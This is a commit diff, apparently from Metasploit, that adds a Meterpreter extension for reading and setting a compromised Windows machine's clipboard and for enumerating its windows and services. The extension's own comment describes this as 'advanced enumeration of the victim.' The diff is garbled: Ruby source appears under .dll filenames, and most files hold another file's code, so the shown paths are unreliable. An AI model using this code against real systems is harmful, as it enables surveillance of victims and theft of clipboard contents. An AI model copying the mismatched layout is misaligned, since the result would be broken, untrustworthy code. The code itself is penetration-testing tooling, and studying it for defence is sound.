Land rapid7#2602, Windows Extended API

Retrieve clipboard data
Retrieve window handles
Retrieve service information

Author: Meatballs1

data/meterpreter/ext_server_extapi.x64.dll

@@ -0,0 +1,88 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+module Clipboard
+
+###
+#
+# This meterpreter extension contains extended API functions for
+# querying and managing desktop windows.
+#
+###
+class Clipboard
+
+  def initialize(client)
+    @client = client
+  end
+
+  # Get the target clipboard data in whichever format we can
+  # (if it's supported).
+  def get_data(download = false)
+    results = []
+
+    request = Packet.create_request('extapi_clipboard_get_data')
+
+    if download
+      request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD, true)
+    end
+
+    response = client.send_request(request)
+
+    text = response.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT)
+
+    if text
+      results << {
+        :type => :text,
+        :data => text
+      }
+    end
+
+    files = []
+    response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE) { |f|
+      files << {
+        :name => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME),
+        :size => f.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE)
+      }
+    }
+
+    if files.length > 0
+      results << {
+        :type => :files,
+        :data => files
+      }
+    end
+
+    response.each(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG) do |jpg|
+      if jpg
+        results << {
+          :type   => :jpg,
+          :width  => jpg.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX),
+          :height => jpg.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMY),
+          :data   => jpg.get_tlv_value(TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DATA)
+        }
+      end
+    end
+
+    return results
+  end
+
+  # Set the target clipboard data to a text value
+  def set_text(text)
+    request = Packet.create_request('extapi_clipboard_set_data')
+
+    request.add_tlv(TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT, text)
+
+    response = client.send_request(request)
+
+    return true
+  end
+
+  attr_accessor :client
+
+end
+
+end; end; end; end; end; end

data/meterpreter/ext_server_extapi.x86.dll

@@ -0,0 +1,41 @@
+# -*- coding: binary -*-
+
+require 'rex/post/meterpreter/extensions/extapi/tlv'
+require 'rex/post/meterpreter/extensions/extapi/window/window'
+require 'rex/post/meterpreter/extensions/extapi/service/service'
+require 'rex/post/meterpreter/extensions/extapi/clipboard/clipboard'
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+
+###
+#
+# This meterpreter extension contains an extended API which will allow for more
+#  advanced enumeration of the victim.
+#
+###
+class Extapi < Extension
+
+  def initialize(client)
+    super(client, 'extapi')
+
+    client.register_extension_aliases(
+      [
+        {
+          'name' => 'extapi',
+          'ext'  => ObjectAliases.new(
+            {
+              'window'  => Rex::Post::Meterpreter::Extensions::Extapi::Window::Window.new(client),
+              'service' => Rex::Post::Meterpreter::Extensions::Extapi::Service::Service.new(client),
+              'clipboard' => Rex::Post::Meterpreter::Extensions::Extapi::Clipboard::Clipboard.new(client)
+            })
+        },
+      ])
+  end
+
+end
+
+end; end; end; end; end

lib/rex/post/meterpreter/extensions/extapi/clipboard/clipboard.rb

@@ -0,0 +1,66 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+module Service
+
+###
+#
+# This meterpreter extension contains extended API functions for
+# querying and managing Windows services.
+#
+###
+class Service
+
+  def initialize(client)
+    @client = client
+  end
+
+  # Enumerate all the services on the target.
+  def enumerate
+    request = Packet.create_request('extapi_service_enum')
+    response = client.send_request(request)
+
+    services = []
+
+    response.each(TLV_TYPE_EXT_SERVICE_ENUM_GROUP) { |s|
+      services << {
+        :name         => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_NAME),
+        :display      => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME),
+        :pid          => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_PID),
+        :status       => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_STATUS),
+        :interactive  => s.get_tlv_value(TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE)
+      }
+    }
+
+    return services.sort_by { |s| s[:name].upcase }
+  end
+
+  # Query some detailed parameters about a particular service.
+  def query(service_name)
+    request = Packet.create_request('extapi_service_query')
+    request.add_tlv(TLV_TYPE_EXT_SERVICE_ENUM_NAME, service_name)
+
+    response = client.send_request(request)
+
+    detail = {
+      :starttype   => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE),
+      :display     => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME),
+      :startname   => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME),
+      :path        => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_PATH),
+      :logroup     => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP),
+      :interactive => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE),
+      :dacl        => response.get_tlv_value(TLV_TYPE_EXT_SERVICE_QUERY_DACL)
+    }
+
+    return detail
+  end
+
+  attr_accessor :client
+
+end
+
+end; end; end; end; end; end

lib/rex/post/meterpreter/extensions/extapi/extapi.rb

@@ -0,0 +1,47 @@
+# -*- coding: binary -*-
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+
+TLV_TYPE_EXTENSION_EXTAPI = 0
+
+TLV_TYPE_EXT_WINDOW_ENUM_GROUP              = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 1)
+TLV_TYPE_EXT_WINDOW_ENUM_PID                = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 2)
+TLV_TYPE_EXT_WINDOW_ENUM_HANDLE             = TLV_META_TYPE_QWORD  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 3)
+TLV_TYPE_EXT_WINDOW_ENUM_TITLE              = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 4)
+TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN     = TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 5)
+
+TLV_TYPE_EXT_SERVICE_ENUM_GROUP             = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 10)
+TLV_TYPE_EXT_SERVICE_ENUM_NAME              = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 11)
+TLV_TYPE_EXT_SERVICE_ENUM_DISPLAYNAME       = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 12)
+TLV_TYPE_EXT_SERVICE_ENUM_PID               = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 13)
+TLV_TYPE_EXT_SERVICE_ENUM_STATUS            = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 14)
+TLV_TYPE_EXT_SERVICE_ENUM_INTERACTIVE       = TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 15)
+
+TLV_TYPE_EXT_SERVICE_QUERY_STARTTYPE        = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 20)
+TLV_TYPE_EXT_SERVICE_QUERY_DISPLAYNAME      = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 21)
+TLV_TYPE_EXT_SERVICE_QUERY_STARTNAME        = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 22)
+TLV_TYPE_EXT_SERVICE_QUERY_PATH             = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 23)
+TLV_TYPE_EXT_SERVICE_QUERY_LOADORDERGROUP   = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 24)
+TLV_TYPE_EXT_SERVICE_QUERY_INTERACTIVE      = TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 25)
+TLV_TYPE_EXT_SERVICE_QUERY_DACL             = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 26)
+
+TLV_TYPE_EXT_CLIPBOARD_DOWNLOAD             = TLV_META_TYPE_BOOL   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 35)
+
+TLV_TYPE_EXT_CLIPBOARD_TYPE_TEXT            = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 40)
+TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE            = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 41)
+TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_NAME       = TLV_META_TYPE_STRING | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 42)
+TLV_TYPE_EXT_CLIPBOARD_TYPE_FILE_SIZE       = TLV_META_TYPE_QWORD  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 43)
+
+TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG       = TLV_META_TYPE_GROUP  | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 45)
+TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMX  = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 46)
+TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DIMY  = TLV_META_TYPE_UINT   | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 47)
+TLV_TYPE_EXT_CLIPBOARD_TYPE_IMAGE_JPG_DATA  = TLV_META_TYPE_RAW    | (TLV_TYPE_EXTENSION_EXTAPI + TLV_EXTENSIONS + 48)
+
+end
+end
+end
+end
+end

lib/rex/post/meterpreter/extensions/extapi/service/service.rb

@@ -0,0 +1,56 @@
+# -*- coding: binary -*-
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module Extapi
+module Window
+
+###
+#
+# This meterpreter extension contains extended API functions for
+# querying and managing desktop windows.
+#
+###
+class Window
+
+  def initialize(client)
+    @client = client
+  end
+
+  # Enumerate all the windows on the target.
+  # If the specified parent window is nil, then all top-level windows
+  # are enumerated. Otherwise, all child windows of the specified
+  # parent window are enumerated.
+  def enumerate(include_unknown = false, parent_window = nil)
+    request = Packet.create_request('extapi_window_enum')
+
+    if include_unknown
+      request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_INCLUDEUNKNOWN, true)
+    end
+
+    if not parent_window.nil?
+      request.add_tlv(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE, parent_window)
+    end
+
+    response = client.send_request(request)
+
+    windows = []
+
+    response.each(TLV_TYPE_EXT_WINDOW_ENUM_GROUP) { |w|
+      windows << {
+        :pid    => w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_PID),
+        :handle => w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_HANDLE),
+        :title  => w.get_tlv_value(TLV_TYPE_EXT_WINDOW_ENUM_TITLE)
+      }
+    }
+
+    windows.sort_by { |w| w[:pid] }
+  end
+
+  attr_accessor :client
+
+end
+
+end; end; end; end; end; end

lib/rex/post/meterpreter/extensions/extapi/tlv.rb

@@ -0,0 +1,61 @@
+# -*- coding: binary -*-
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# Extended API user interface.
+#
+###
+class Console::CommandDispatcher::Extapi
+
+  require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/window'
+  require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/service'
+  require 'rex/post/meterpreter/ui/console/command_dispatcher/extapi/clipboard'
+
+  Klass = Console::CommandDispatcher::Extapi
+
+  Dispatchers =
+    [
+      Klass::Window,
+      Klass::Service,
+      Klass::Clipboard
+    ]
+
+  include Console::CommandDispatcher
+
+  #
+  # Initializes an instance of the extended API command interaction.
+  #
+  def initialize(shell)
+    super
+
+    Dispatchers.each { |d| shell.enstack_dispatcher(d) }
+  end
+
+  #
+  #
+  # List of supported commands.
+  #
+  def commands
+    {
+    }
+  end
+
+  #
+  # Name for this dispatcher
+  #
+  def name
+    "Extended API Extension"
+  end
+
+end
+
+end
+end
+end
+end